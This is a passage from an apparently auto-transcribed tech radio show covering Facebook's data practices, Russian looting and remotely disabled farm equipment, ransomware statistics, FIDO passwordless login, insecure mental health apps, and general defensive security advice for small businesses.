lake? They're totally right about that. Where did they collect it from? Apparently they don't even know where they got some of this information. [00:08:43] This data from reminds me of the no fly list. You don't know you're on it and you can't get yourself off of it. It's crazy. So this document that we're talking about, it was written last year by. Privacy engineers on the ad and business product team, whose mission is to make meaningful connections between people and businesses and which quote sits at the center of our monetization strategy. [00:09:06] And is the engine that powers Facebook's growth. Interesting. Interesting problems. And I see this being a problem well into the future for more and more of these companies, look at Twitter as an example that we've all heard about a lot lately. And then I've talked about as well along comes Elon Musk and he says wait a minute. [00:09:29] I can make Twitter way more profitable. We're going to get rid of however many people over a thousand, and then we are going to hire more people. We're going to start charging. We're going to be more efficient. You can bet all of these redundancies that are in Facebook are also there. And Twitter also has to comply with all of these regulations that Facebook is freaking out about it for a really a very good reason. [00:10:00] So this document is available to anybody who wants to look at it. I'm looking at it right now, talking about regulatory landscape and the fundamental problems Facebook's data lake. And this is a problem that most companies have not. As bad as Facebook does the button. Most companies you write, you grow. I have yet to walk into a business that needs help with cybersecurity and find everything in place as it should be because it grew organically. [00:10:32] Do you started out with a little consumer firewall router, wifi, and then you added to it and you put a switch here and you added another switch behind that and move things around. This is normal. This is not total incompetence on the part of the management, but my gosh, I don't know. Maybe they need an Elon Musk. [00:10:52] Just straighten them out as well. Hey, stick around. I'll be right back and sign up online@craigpeterson.com. [00:11:02] Apparently looting is one of the benefits of being a Russian soldier. And according to the reports coming out of Ukraine, they've been doing it a lot, but there's a tech angle on here that is really turning the tables on these Russian Looters. [00:11:19] We know in wars, there are people that loot and typically the various militaries try and make sure, at least recently that looting is kept to an absolute minimum. [00:11:32] Certainly the Americans, the British, even the Nazis during world war II the the socialists they're in. Germany they tried to stop some of the looting that was going on. I think that's probably a very good thing, because what you end up with is just all of these locals that are just totally upset with you. [00:11:57] I found a great article on the guardian and there's a village. I hadn't been occupied for about a month by Russian troops and the people came back. They are just shocked to see what happened in there. Giving a few examples of different towns. They found that the alcohol was stolen and they left empty bottles behind food wrappers, cigarette butts, thrown all over the place in apartments in the home. [00:12:26] Piles of feces blocking the toilets, family photographs torn, thrown around the house. They took away all of the closes as a code from one of the people, literally everything, male and female coats, boots, shirts, jackets, even my dresses and laundry. This is really something. The Sylvia's didn't do this, but now Russia. [00:12:49] The military apparently does. So over the past couple of weeks, there have been reporting from numerous places where Russian troops had occupied Ukrainian territory and the guardian, which is this UK newspaper collected evidence to suggest looting by Russian forces was not merely a case of a few way, word soldiers, but a systematic part of Russian military behavior across multiple towns. [00:13:17] And villages. That's absolutely amazing. Another quote here, people saw the Russian soldiers loading everything onto your old trucks. Everything they could get their hands on a dozen houses on the villages. Main street had been looted as well as the shops. Other villagers reported losing washing machines, food laptops, even as sofa, air conditioner. [00:13:41] Being shipped back, just you might use ups here or they have their equivalent over there. A lady here who was the head teacher in the school, she came back in, of course, found her home looted and in the head teacher's office. She found an open pair of scissors that had been jammed into a plasma screen that was left behind because if they can't steal it, they're going to destroy it. [00:14:07] They don't wanna leave anything behind. They found the Russian to take in most of the computers, the projectors and other electronic equipment. It's incredible. So let's talk about the turnaround here. You might've heard stories about some of these bad guys that have smashed and grabbed their way into apple stores. [00:14:27] So they get into the apple store. They grab laptops on iPads, no longer iPods, because they don't make those anymore. And I phone. And they take them and they run with them. Nowadays there's not a whole lot of use for those. Now what they have been doing, some of these bad guys is they'd take some parts and use them in stolen equipment. [00:14:52] They sell them on the used market, et cetera. But when you're talking about something specific, like an iPhone that needs specific activation. Completely different problem arises for these guys because that iPhone needs to have a SIM card in order to get onto the cell network. And it also has built in serial numbers. [00:15:15] So what happens in those cases while apple goes ahead and disables them. So as soon as they connect to the internet, they didn't say they put them on wifi. They don't get a SIM card. They don't. Service from T-Mobile or Verizon or whoever it might be. So now they just connect to the wifi and it calls home. [00:15:33] Cause it's going to get updates and download stuff from the app store and they find that it's been bricked. Now you can do that with a lot of mobile device managers that are available for. All kinds of equipment nowadays, but certainly apple equipment where if a phone is lost or stolen or a laptop or other pieces of equipment, you can get on the MDM and disable it, have it remotely erase, et cetera. [00:16:00] Now, please have had some interesting problems with that. Because a bad guy might go ahead and erase a smartphone. That's in the evidence locker at the police station. So they're doing things like putting them into Faraday cages or static bags or other things to try and stop that. So I think we've established here that the higher tech equipment is pretty well protected. [00:16:25] You steal it. It's not going to do you much. Good. So one of the things the Russian stole when they were in a it's called a, I think you pronounced. Melad Mellott DePaul which is again, a Ukrainian city is they stole all of the equipment from a farm equipment dealership and shipped it to check. Now that's according to a source in a businessman in the area that CNN is reporting on. [00:16:56] So they shipped this equipment. We're talking about combine harvesters were 300 grand a piece. They shipped it 700 miles. And the thieves were ultimately unable to use the equipment because it had been locked remotely. So think about agriculture equipment that John Deere, in this case, these pieces of equipment, they, they drive themselves. [00:17:23] It's atonomous it goes up and down the field. Goes to any pattern that you want to it'll bring itself within a foot or an inch of your boundaries, of your property being very efficient the whole time, whether it's planting or harvesting, et cetera. And that's just a phenomenal thing because it saves so much time for the farmer makes it easier to do the companies like John Deere. [00:17:49] Want to sell as many pieces of this equipment as they possibly can. And farming is known to be a what not terribly profitable business. And certainly isn't like Facebook. So how can they get this expensive equipment into the hands of a lot of farmers? What they do is they use. So you can lease the equipment through leasing company or maybe directly from the manufacturer and now you're off and running. [00:18:16] But what happens if the lease isn't paid now? It's one thing. If you don't pay your lease on a $2,000 laptop, right? They're probably not going to come hunting for you, but when you're talking about a $300,000 harvester, they're more interested. So the leasing company. Has titled to the equipment and the leasing company can shut it off remotely. [00:18:41] You see where I'm going with this so that they can get their equipment in the hands of more farmers because the farmers can lease it. It costs them less. They don't have to have a big cash payment. You see how this all works. So when the Russian forces stole this equipment, that's valued, total value here is about $5 million. [00:19:02] They were able to shut it all off. And th the, obviously if you can't start the engine, because it's all shut off and it's all run by computers nowadays, and there's pros and cons to that. I think there's a lot of cons, but what are you going to do? How's that going to work for? Isn't going to work for you. [00:19:22] And they were able to track it and had GPS trackers find out exactly where it was. That's how they know it was Tara taken to Chechnya and could be controlled remotely. And in this case, how did they control it? They completely. Shut it off, even if they sell the harvesters for spare parts to learn some money, but they sure aren't gonna be able to sell them for the 300 grand that they were actually worth. [00:19:48] Hey, stick around. We'll be right back and visit me online@craigpeterson.com. If you sign up there, you'll be able to get my insider show notes. And every week I have a quick. Training right there. New emails, Craig Peterson.com. [00:20:05] If you've been worried about ransomware, you are right to worry. It's up. It's costly. And we're going to talk about that right now. What are the stats? What can you do? What happens if you do get hacked? Interesting world! [00:20:20] Ransomware has been a very long running problem. I remember a client of ours, a car dealership who we had gone in. [00:20:31] We had improved all of their systems and their security, and one of them. People who was actually a senior manager, ended up downloading a piece of ransomware, one of these encrypted ones and opened it up and his machine all of a sudden, guess what it had ransomware on it. One of those big. Green's that say, pay up and send us this much Bitcoin, and here's our address. [00:21:00] All of that sort of stuff. And he called us up and said, what's going on here? What happened? First of all, don't bring your own machine into the office. Secondly, don't open up as particularly encrypted files using a password that they gave. And thirdly, we stopped it automatically. It did not spread. [00:21:20] We were able to completely restore his computer. Now let's consider here the consequences of what happened. So he obviously was scared. And within a matter of a couple of hours, we actually had him back to where he was and it didn't spread. So the consequences there, they weren't that bad. But how about if it had gotten worse? [00:21:47] How about if the ransomware. Also before it started holding his computer ransom, went out and found all of the data about their customers. What do you think an auto dealership would love to hear that all of their customer data was stolen and released all of the personal data of all of their customers? [00:22:08] Obviously not. So there's a potential cost there. And then how long do you think it would take a normal company? That thinks they have backups to get back online. All I can tell you it'll take quite a while because the biggest problem is most backups don't work. We have yet to go into a business that was actually doing backups that would work to help restore them. [00:22:35] And if you're interested, I can send you, I've got something I wrote up. Be glad to email it back to you. Obviously as usual, no charge. And you'll be able to go into that and figure out what you should do. Cause I, I break it down into the different types of backups and why you might want to use them or why you might not want to use them, but ransomware. [00:22:58] Is a kind of a pernicious nasty little thing, particularly nowadays, because it's to two factor, first is they've encrypted your data. You can't get to it. And then the second side of that is okay I can't get to my data and now they're threatening to hold my data ransom or they'll release. So they'll put it out there. [00:23:22] And of course, if you're in a regulated industry, which actually car dealers are because they deal with financial transactions, leases, loans, that sort of thing you can lose your license for your business. You can, you lose your ability to go ahead and frankly make loans and work with financial companies and financial instruments. [00:23:45] It could be a very big. So there are a lot of potential things that can happen all the way from losing your reputation as a business or an individual losing all of the money in your operating account. And again, we've got a client that we picked up afterwards. That yes, indeed. That lost all of the money in their operating account. [00:24:09] And then how do you make payroll? How do you do things? There's a new study that came out from checkpoint. Checkpoint is one of the original firewall companies and they had a look at ransomware. What are the costs of ransomware? Now bottom line, I'm looking at some stats here on a couple of different sites. [00:24:29] One is by the way, Conti, which is a big ransomware gang that also got hacked after they said we are going to attack anyone. That doesn't defend Plaid's invasion of Ukraine, and then they got hacked and their information was released, but here's ransomware statistics. This is from cloud words. First of all, the largest ransom demand is $50 million. [00:24:55] And that was in 2021 to Acer big computer company. 37% of businesses were hit by ransomware. In 2021. This is amazing. They're expecting by 2031. So in about a decade, ransomware is going to be costing about $265 billion a year. Now on average. Ransomware costs businesses. 1.8, $5 million to recover from an attack. [00:25:25] Now that's obviously not a one or two person place, but think of the car dealer again, how much money are they going to make over the year or over the life of the business? If you're a car dealer, you have a license to print money, right? You're selling car model or cars from manufacturers. And now you have the right to do that and they can remove that. [00:25:48] How many tens, hundreds of millions of dollars might that end up costing you? Yeah. Big deal. Total cost of ransomware last year, $20 billion. Now these are the interesting statistics here right now. So pay closer attention to this 32% of ransomware victims paid a ransom. So about a third Peter ransom demand. [00:26:12] Lastly. It's actually down because my recollection is it used to be about 50% would pay a ransom. Now on average that one third of victims that paid a ransom only recovered 65% of their data. Now that differs from a number I've been using from the FBI. That's a little bit older that was saying it ends it a little better than 50%, but 65% of pain victims recovered their. [00:26:41] Now isn't that absolutely amazing. Now 57% of companies were able to recover their data, using a cloud backup. Now think about the different types of backup cloud backup is something that can work pretty well if you're a home user, but how long did it take for your system to get back? Probably took weeks, right? [00:27:05] For a regular computer over a regular internet line. Now restoring from backups is going to be faster because your downlink is usually faster than your uplink. That's not true for businesses that have real internet service like ours. It's the same bandwidth up as it is down. But it can take again, days or weeks to try and recover your machine. [00:27:28] So it's very expensive. And I wish I had more time to go into this, but looking at the costs here and the fact that insurance companies are no longer paying out for a lot of these ransomware attacks, it could be credibly expensive for you incredibly. The number one business types by industry for ransomware attacks, retail. [00:27:59] That makes sense. Doesn't it. Real estate. Electrical contractors, law firms and wholesale building materials. Isn't that interesting? And that's probably because none of these people are really aware or conscious of doing what a, of keeping their data secure of having a good it team, a good it department. [00:28:24] So there's your bottom line. Those are the guys that are getting hit. The most, the numbers are increasing dramatically and your costs are not just in the money. You might pay as a ransom. And as it turns out in pretty much every case prevention. Is less expensive and much better than the cure of trying to pay ransom or trying to restore from backups. [00:28:52] Hey, you're listening to Craig Peterson. You can get my weekly show notes by just going to craig peterson.com. [00:29:00] You and I have talked about passwords before the way to generate them and how important they are. We'll go over that again a little bit in just a second, but there's a new standard out there that will eliminate the need for passwords. [00:29:16] Passwords are a necessary evil, at least they have been forever. I remember, I think the only system I've ever really used that did not require passwords was the IBM 360. [00:29:31] Yeah, 360, you punch up the cards, all of the JCL you feed the card deck in and off it goes. And does this little thing that was a different day, a different era. When I started in college in university, we. We had a remote systems, timeshare systems that we could log into. And there weren't much in the line of password requirements. [00:29:58] And, but you had a username, you had a simple password. And I remember one of our instructors, his name was Robert, Andrew Lang, and his password was always some sort of a combination of RA Lang. So it was always easy to guess what his password was. Today. It has gotten a lot worse today. We have devices with us all the time. [00:30:22] You might be wearing a smart watch. That requires a password. You course probably have a smartphone that also maybe requiring a password. Certainly after it boots nowadays they use fingerprints or facial recognition, which is handy, but it has its own drawbacks. But how about the websites? You're going to the systems you're using in you're at work and logging in. [00:30:49] They all require password. And usernames of some sort or another well, apple, Google, and Microsoft have all committed to expanding their support for a standard. That's actually been out there for a few years. It's called the Fido standard. And the idea behind this is that you don't have to have a password in order to. [00:31:15] Now that's really an interesting thing, right? Just looking at it because we're so used to have in this password only authenticate. And of course the thing to do there is to make sure you have for your password, multiple words in the password, it should really be a pass phrase. And between the words put in special characters or numbers, maybe. [00:31:41] Upper lower case a little bit. In those words, those are the best passwords, 20 characters, 30 characters long. And then if you have to have a pin, I typically use a 12 digit pin. And how do I remember all of these? Cause I use a completely different password for every website and right now, Let me pull it up. [00:32:03] I'm using one password dot coms, password manager. And my main password for that is about 25 characters long. And I have thirty one hundred and thirty five. And trees here in my password manager, 3,100, that is a whole lot of passwords, right? As well as software licenses and a few other things in there. [00:32:30] That's how we remember them is using a password manager. One password.com is my favorite. Now, obviously I don't make any money by referring you there. I really do like that. Some others that I've liked in the past include last pass, but they really meant. With some of their cybersecurity last year and I lost my faith in it. [00:32:51] So now what they're trying to do is make these websites that we go to as well as some apps to have a consistent, secure, and passwordless. And they're going to make it available to consumers across all kinds of devices and platforms. That's why you've got apple, Google, and Microsoft all committing to it. [00:33:15] And you can bet everybody else is going to follow along because there's hundreds of other companies that have decided they're going to work with the Fido Alliance and they're going to create this passwordless future. Which I like this idea. So how does this work? Basically you need to have a smartphone. [00:33:33] This is, I'm just going to go with the most standard way that this is going to work here in the future, and you can then have. Passkey, this is like a multi-factor authentication or two factor authentication. So for instance, right now, when I sign into a website online, I'm giving a username, given a password, and then it comes up and it asks me for a code. [00:33:57] So I enter in a six digit code and that code changes every 30 seconds. And again, I use my password manager from one password. In order to generate that code. So that's how I log into Microsoft site and Google sites and all kinds of sites out there. So it's a similar thing here now for the sites for my company, because we do cyber security for businesses, including regulated businesses. [00:34:24] We have biometrics tied in as. So to log into our systems, I have to have a username. I have to have a password. I then am sent to a single sign-on page where I have to have a message sent to my smart device. That then has a special app that uses biometrics either a face ID or a fingerprint to verify who I am. [00:34:49] Yeah, there's a lot there, but I have to protect my customers. Something that very few it's crazy. Actual managed security services providers do, but it's important, right? By the way, if you want my password. Special report, just go to Craig peterson.com. Sign up for my email list. I'll send that to you. [00:35:13] That's what we're sending out right now for anyone who signs up new@craigpeterson.com. And if you'd like a copy of it in you're already on the list, just go ahead and email me. At Craig peterson.com and ask for the password special report where I go through a lot of this sort of thing. So what will happen with this is you go to a website and I might come up with a QR code. [00:35:37] So you then scan that QR code with your phone and verify it, authorize it on your phone. You might again to have it set up so that your phone requires a facial recognition or perhaps it'll require a fingerprint. And now you are. Which is very cool. They fix some security problems in Fido over the last few years, which is great over the coming year. [00:36:02] You're going to see this available on apple devices, Google Microsoft platforms, and it really is simple, stronger authentication. That's sort of Fido calls it. But it is going to make your life a lot easy, easier. It is a standard and the passwordless future makes a whole lot of sense for all of us. Now, I want to talk about another thing here that just bothered me for a long time. [00:36:30] I have a sister. Who is in the medical field and gives prescriptions, doctor thing. And I think she's not quite a doctor. I can't remember what she has. She's an LPN or something. And anyhow, so she. We'll get on a zoom call with someone and they'll go through medical history and what's happening right now and she'll make prescriptions. [00:36:57] And so I warned her about that saying, it is very bad to be using zoom because zoom is not secure. Never has been, probably never will be right. If you want secure. To go and pay for it from one of these providers like WebEx, that's what we use. We have a version of WebEx that is set up to be secure. [00:37:20] So I talked to her about that and said, Hey, listen, you can't do this. You've really got to go another way here. And so she started using one of these mental or. Medical health apps. What I want to talk about right now specifically are some checks that were just performed some audits on mental health apps. [00:37:45] That's why I messed up a second ago, but what they looked at is that things are a serious problem there. And then fact, the threat post, just calling it a. Frankly, just plain old creepy. So they've got some good intentions. They want to help with mental health. You've probably seen these or at least heard them advertise. [00:38:06] So you can get on the horn with a mental health professional, a doctor or otherwise in order to help you here with your psychological or spiritual wellness. And people are sharing their personal and sensitive data with third parties and have 32 mental health and prayer mobile apps that were investigated by the open source organization. [00:38:32] 28, 28 of the 32 were found to be inherently insecure and were given a privacy not included label, including others here. So this is a report. That was released here by the open source organization, tied into Mozilla. Those are the Firefox people. They have what they call their minimum security standards. [00:38:56] So things like requiring strong passwords, managing security, updates, and vulnerabilities, et cetera. 25 of the 32 failed to meet. Even those minimum security standards. So these apps are dealing with some of the most sensitive mental health and wellness issues people can possibly have, right? Depression, anxieties, suicidal fonts, domestic violence, eating disorders. [00:39:23] And they are being just terrible with your security Mozilla researchers spent 255 hours or about eight hours per product pairing under the hood of the security, watching the data that was going back and forth, right between all of these mental health and prayer apps. It was just crazy. So for example, eight of the apps reviewed, allowed weak passwords, that range. [00:39:52] One digit one as the password to 1, 1, 1, 1, while a mental health app called a mood fit only required one letter or digit as a password. Now that is very concerning for an app that collects mood and symptom data. So be very careful. Two of the apps better help a popular app that connects users with therapists and better stop suicide, which is a course of suicide prevention app have vague and messy, according to Mozilla privacy policies that have little or no effect on actual. [00:40:30] User data protection. So be very careful. And if you're a mental health, professional or medical professional, don't just go and use these open video calls, et cetera, et cetera, find something good. And there are some standards out there. Again. Visit me online, get my insider show notes every week. Get my little mini trends. [00:40:56] And they come up most weeks. Just go to Craig peterson.com. And I'll send you my special report on passwords and more. [00:41:06] We know the Russians have been attacking us. I've talked a lot about it on the radio station, all kinds of stations. In fact, here over the last couple of weeks, and I am doing something special, we are going through the things you can do to keep safe. [00:41:23] Last week we started doing something I promise we would continue. [00:41:27] And that is how can you protect yourself when it comes to the Russians, right? When it comes to the bad guys, because the Russians are definitely the bad guys. There's a few things you can do. And there's a few things, frankly, you shouldn't be doing. And that's exactly what we're going to talk about right now. [00:41:45] So last week he went over some steps, some things that you can look at that you should look at that are going to help protect you. And we are going to go into this a whole lot more today. And so I want you to stick around and if you miss anything, you can go online. You can go to Craig peterson.com, make sure you sign up there for my email. [00:42:08] And what I'm going to do for you is. Send you a few different documents now where we can chat back and forth about it, but I can send you this. Now I'm recording this on video as well as on audio. So you can follow along if you're watching either on YouTube or. Over on rumble and you can find it also on my website. [00:42:32] I've been trying to post it up there too, but right now let's talk about what we call passive backend protections. So you've got the front end and the front end of course, is. Stuff coming at you, maybe to the firewall I've mentioned last week about customers of mine. I was just looking at a few customers this week, just so I could have an idea of their firewalls. [00:42:59] And they were getting about 10 attacks per minute. Yeah. And these were customers who have requirements from the department of defense because they are defense sub subcontractors. So again, Potential bad guys. So I looked up their IP addresses and where the attacks were coming from. Now, remember that doesn't mean where they originated because the bad guys can hop through multiple machines and then get onto your machine. [00:43:28] What it means is that all, ultimately they ended up. Coming from one machine, right? So there's an IP address of that machine. That's attacking my clients or are attacking my machines. That just happens all the time. A lot of scans, but some definite attacks where they're trying to log in using SSH. [00:43:48] And what I found is these were coming from Slovakia, Russia, and Iran. Kind of what you were expecting, right? The Iranians, they just haven't given up yet. They keep trying to attack, particularly our military in our industry. One of the things we found out this week from, again, this was an FBI notice is that the Russians have been going after our industrial base. [00:44:15] And that includes, in fact, it's more specifically our automobile manufacturers we've already got problems, right? Try buying a new car, try buying parts. I was with my friend, just this. I helped them because he had his car right. Need to get picked up. So I took him over to pick up his car and we chatted a little bit with this small independent automotive repair shop. [00:44:40] And they were telling us that they're getting sometimes six, eight week delays on getting parts and some parts. They just can't. So they're going to everything from junkyards on out, and the worst parts are the parts, the official parts from the car manufacturers. So what's been happening is Russia apparently has been hacking into these various automobile manufacturers and automobile parts manufacturers. [00:45:10] And once they're inside, they've been putting in. A remote control button net. And those botnets now have the ability to wake up when they want them to wake up. And then once they've woken up, what do they do? Who knows? They've been busy erasing machines causing nothing, but having they've been doing all kinds of stuff in the past today, they're sitting there. [00:45:31] Which makes you think they're waiting, it's accumulate as much as you possibly can. And then once you've got it all accumulated go ahead and attack. So they could control thousands of machines, but they're not just in the U S it's automobile manufacturers in Japan. That we found out about. [00:45:50] So that's what they're doing right now. So you've got the kind of that front end and back end protections. So we're going to talk a little bit about the back end. What does that mean? When a cybersecurity guy talks about the backend and the protections. I got it up on my green right now, but here's the things you can do. [00:46:10] Okay. Remember, small businesses are just getting nailed from these guys, because again, they're fairly easy targets. One change your passwords, right? How many times do we have to say that? And yet about 70% of businesses out there are not using a good password methodology. If you want more information on passwords, two factor authentication, you name it. [00:46:37] Just email me M e@craigpeterson.com. I want to get the information out now. You got to make sure that all of the passwords on your systems are encrypted are stored in some sort of a good password vault as you really should be looking at 256 bit encryption or better. I have a vendor of. That I use. So if you get my emails every week, when them, there's the little training. [00:47:06] And so I'll give you a five minute training. It's written usually it's in bullet point for, I'm just trying to help you understand things. That provider of mine has a big database and there's another provider that I use that is for. So the training guys use the database of my provider. [00:47:27] In using that database, they're storing the passwords and the training providers putting passwords in the clinics. Into the database, which is absolutely crazy. So again, if you're a business, if you're storing any sort of personal information, particularly passwords, make sure that you're using good encryption and your S what's called salting the hash, which means. [00:47:53] You're not really storing the password, just joining assaulted hash. I can send you more on this. If you are a business and you're developing software that's, this is long tail stuff here. Configure all of the security password settings so that if someone's trying to log in and is failing that, and you block it, many of us that let's say you're a small business. [00:48:15] I see this all of the time. Okay. You're not to blame. You, but you have a firewall that came from the cable company. Maybe you bought it at a big box retailer. Maybe you bought it online over at Amazon, as hurricane really great for you. Has it got settings on there that lets you say. There's 20 attempts to log in. [00:48:38] Maybe we should stop them. Now, what we do personally for our customers is typically we'll block them at somewhere around three or four failed attempts and then their passwords block. Now you can configure that sort of thing. If you're using. Email. And that's an important thing to do. Let me tell you, because we've had some huge breaches due to email, like Microsoft email and passwords and people logging in and stealing stuff. [00:49:06] It was just a total nightmare for the entire industry last year, but limit the number of login retries as well as you're in there. These excessive login attempts or whatever you want to define it as needs to lock the account. And what that means is even if they have the right password, they can't get in and you have to use an administrative password in order to get in. [00:49:31] You also want to, what's called throttle, the rate of repeated logins. Now you might've gotten caught on this, right? You went to your bank, you went to E-bay, you went to any of these places and all of a sudden. And denied you write it blocked you. That can happen when your account is on these hackers lists. [00:49:51] You remember last week we talked about password spraying while that's a very big deal and hackers are doing the sprain trick all of the time, and that is causing you to get locked out of your own account. So if you do get locked out, remember it might be because someone's trying to break. Obviously you have to enforce the policies. [00:50:16] The capture is a very good thing. Again, this is more for software developer. We always recommend that you use multifactor or two factor authentication. Okay. Do not use your SMS, your text messages for that, where they'll send you a text message to verify who you are. If you can avoid that, you're much better off. [00:50:36] Cause there's some easy ways to get around that for hackers that are determined. Okay. A multi-factor again, installed an intrusion. system. We put right at the network edge and between workstations and servers, even inside the network, we put detection systems that look for intrusion attempts and block intrusion attempts. [00:51:02] A very important use denied lists to block known attackers. We build them automatically. We use some of the higher end Cisco gates. Cisco is a big network provider. They have some of the best hardware and software out there, and you have to subscribe to a lot of people complain. I ain't going to just go buy a firewall for 200 bucks on Amazon. [00:51:24] Why would I pay that much a month just to to have a Cisco firewall? And it's like praying pain for the brand. I've got by logo chert on here. Oh, I wouldn't pay for that. No, it's because they are automatically providing block lists that are updated by the minute sometimes. And then make sure you've got an incident response plan in place. [00:51:50] What are you going to do when they come for you? What are you going to do?  [00:51:55] Now we're going to talk about prevention. What can you do an order to stop some of these attacks that are coming from Russia and from other countries, it is huge. People. Believe me, this is a very big problem. And I'm here to help. [00:52:12] We've reviewed a number of things that are important when it comes to your cyber security and your protection. [00:52:20] We talked about the front end. We talked about the backend. Now we're going to talk about pure prevention and if you're watching. Online. You'll be able to see my slides as they come up, as we talk about some of this stuff and you'll find me on YouTube and you'll also find me on rumble, a fairly new platform out there platform that doesn't censor you for the things you say. [00:52:44] Okay. So here we go. First of all, enabling your active directory password protection is going to. Four's password protection all the way through your business. Now I've had some discussions with people over the months, over the years about this whole thing and what should be done, what can be done, what cannot be done. [00:53:09] Hey, it's a very big deal when it comes to password protection and actor directory, believe it or not, even though it's a Microsoft product is pretty darn good at a few things. One of them is. Controlling all the machines and the devices. One of the things we do is we use an MDM or what used to be a mobile device manager called mass 360. [00:53:34] It's available from IBM. We have a special version of that allows us as a managed security services provider to be able to control everything on people's machines. Active directory is something you should seriously consider. If you are a Mac based shop. Like I am. In fact, I'm sitting right now in front of two max that I'm using right now, you'll find that active directory is a little bit iffy. [00:54:04] Sometimes for max, there are some work around and it's gotten better mastery. 60 is absolutely the way to go, but make sure you've got really good. Passwords and the types of passwords that are most prone to sprain the attacks are the ones you should be banning specifically. Remember the website? Have I been poned? [00:54:28] Yeah. It's something that you should go to pretty frequently. And again, if you miss anything today, just email me M e@craigpeterson.com. Believe me, I am not going to harass you at all. Okay. Now, the next thing that you should be doing is what's called red team blue team. Now the red team is a group of people, usually outside of your organization. [00:54:54] If you're a big company they're probably inside, but the red team is the team that attacks you. They're white hat hackers, who are attacking you, looking for vulnerabilities, looking for things that you should or shouldn't be doing. And then the blue team is the side that's trying to defend. So think of, like war games. [00:55:12] Remember that movie with Matthew Broderick all of those decades ago and how the, he was trying to defend that computer was trying to defend that it moved into an attack mode, right? Red team's attack, blue team is defend. So you want. To conduct simulated attacks. Now w conducting these attacks include saying, oh my let's now put in place and execute our plan here for what are we going to do once we have a. [00:55:44] And you darn well better have a breach plan in place. So that's one of the things that we help as a fractional chief information security officer for companies, right? You've got to get that in place and you have to conduct these simulated attacks and you have to do penetration testing, including password spraying attacks. [00:56:04] There's so many things you can do. The one of the things that we like to do and that you might want to do, whether you're a home user, retiree or a business is go and look online, you can just use Google. I use far more advanced tools, but you can use Google and look for your email address right there. [00:56:23] Look for the names of people inside your organization. And then say wait a minute, does that data actually need to be there? Or am I really exposing the company exposing people's information that shouldn't be out there because you remember the hackers. One of the things they do is they fish you fish as in pH. [00:56:47] So they'll send you an email that looks like. Hey let me see. I know that Mary is the CFO, and I know that Joe's going to be out of town for two weeks in The Bahamas, not a touch. So while he's got. I'm going to send an email to Mary, to get her to do something, to transfer the company's funds to me. [00:57:06] Okay. So that's what that's all about. You've got to make sure, where is our information? And if you go to my company's page, mainstream.net, you'll see on there that I don't list any of the officers or any of the people that are in the company, because that again is a security problem. [00:57:24] We're letting them know. I go to some of these sites, like professional sites lawyers, doctors, countenance, and I find right there all, are there people right there top people or sometimes all of them. And then we'll say, yeah, I went to McGill university, went to Harvard, whatever my B. It's all there. So now they've got great information to fish you, to fish that company, because all they have to do is send an email to say, Hey, you remember me? [00:57:56] We're in Harvard when this class together. And did you have as a professor to see how that works? Okay. You also want to make. That you implement, what's called a passwordless user agent, and this is just so solely effective. If they cannot get into your count, what's going to, what could possibly go wrong, but one of the ways to not allow them into the count is to use. [00:58:24] Biometrics. We use something called duo and we have that tied into the single sign-on and the duo single sign-on works great because what it does now is I put in, I go to a site, I put it into my username and. Pulls up a special splash page that is running on one of our servers. That again asks me for my duo username. [00:58:48] So I've got my username for the site then to my dual username and my duo password single sign on. And then it sends me. To an app on my smart device, a request saying, Hey, are you trying to log into Microsoft? And w whatever it might be at Microsoft, and you can say yes or no, and it uses biometric. [00:59:11] So those biometrics now are great because it says, oh, okay, I need a face ID or I need a thumb print, whatever it might be that allows a generalized, a password, less access. Okay. Password less. Meaning no pass. So those are some of the top things you can do when it comes to prevention. And if you use those, they're never going to be able to get at your data because it's something you have along with something, it works great. [00:59:45] And we like to do this. Some customers. I don't like to go through those hoops of the single sign-on and using duo and making that all work right where we're fine with it. We've got to keep ourselves, at least as secure as the DOD regulations require unlike almost anybody else in industry, I'm not going to brag about it. [01:00:09] But some of our clients don't like to meet the tightest of controls. And so sometimes they don't. I hate to say that, but they just don't and it's a fine line between. Getting your work done and being secure, but I think there's some compromises it can be readily made. We're going to talk next about saving your data from ransomware and the newest ransomware. [01:00:36] We're going to talk about the third generation. That's out there right now. Ransomware, it's getting crazy. Let me tell ya and what it's doing to us and what you can do. What is a good backup that has changed over the last 12 months? It's changed a lot. I used to preach 3, 2, 1. There's a new sheriff in town. [01:00:58] Stick around Craig peterson.com. [01:01:02] 3, 2, 1 that used to be the standard, the gold standard for backing up. It is no longer the case with now the third generation of ransomware. You should be doing something even better. And we'll talk about it now. [01:01:19] We're doing this as a simulcast here. It's on YouTube. It is also on rumble. [01:01:27] It's on my website@craigpeterson.com because we're going through the things that you can do, particularly if you're a business. To stop the Russian invasion because as we've been warned again and again, the Russians are after us and our data. So if you missed part of what we're talking about today, or. [01:01:50] Last week show, make sure you send me an email. me@craigpeterson.com. This is the information you need. If you are responsible in any way for computers, that means in your home, right? Certainly in businesses, because what I'm trying to do is help and save those small businesses that just can't afford to have full-time. [01:02:15] True cyber security personnel on site. So that's what the whole fractional chief information security officer thing is about. Because you just, you can't possibly afford it. And believe me, that guy that comes in to fix your computers is no cyber security expert. These people that are attacking our full time cybersecurity experts in the coming from every country in the world, including the coming from the us. [01:02:44] We just had more arrests last week. So let's talk about ransomware correctly. Ransomware, very big problem. Been around a long time. The first version of ransomware was software got onto your computer through some mechanism, and then you had that red screen. We've all seen that red screen and it says, Hey, pay up buddy. [01:03:07] It says here you need to send so many Bitcoin or a fraction of a Bitcoin or so many dollars worth of Bitcoin. To this Bitcoin wallet. And if you need any help, you can send email here or do a live chat. They're very sophisticated. We should talk about it some more. At some point that was one generation. [01:03:29] One generation two was not everybody was paying the ransoms. So what did they do at that point? They said let me see if they, we can ransom the data by encrypting it and having them pay us to get it back. 50% of the time issue got all your data back. Okay. Not very often. Not often enough that's for sure. [01:03:49] Or what we could do is let's steal some of their intellectual property. Let's steal some of their data, their social security number, their bank, account numbers, et cetera. They're in a, in an Excel spreadsheet on their company. And then we'll, if they don't pay that first ransom, we'll tell them if they don't pay up, we'll release their information. [01:04:10] Sometimes you'll pay that first ransom and then they will hold you ransom a second time, pretending to be a different group of cyber terrorists. Okay. Number three, round three is what we're seeing right now. And this is what's coming from Russia, nears, everything we can tell. And that is. They are erasing our machines. [01:04:31] Totally erasing them are pretty sophisticated ways of erasing it as well, so that it sinks in really, it's impossible to recover. It's sophisticated in that it, it doesn't delete some key registry entries until right at the very end and then reboots and computer. And of course, there's. Computer left to reboot, right? [01:04:55] It's lost everything off of that hard drive or SSD, whatever your boot devices. So let's talk about the best ways here to do some of this backup and saving your data from ransomware. Now you need to use offsite disconnected. Backups, no question about it. So let's talk about what's been happening. [01:05:17] Hospitals, businesses, police 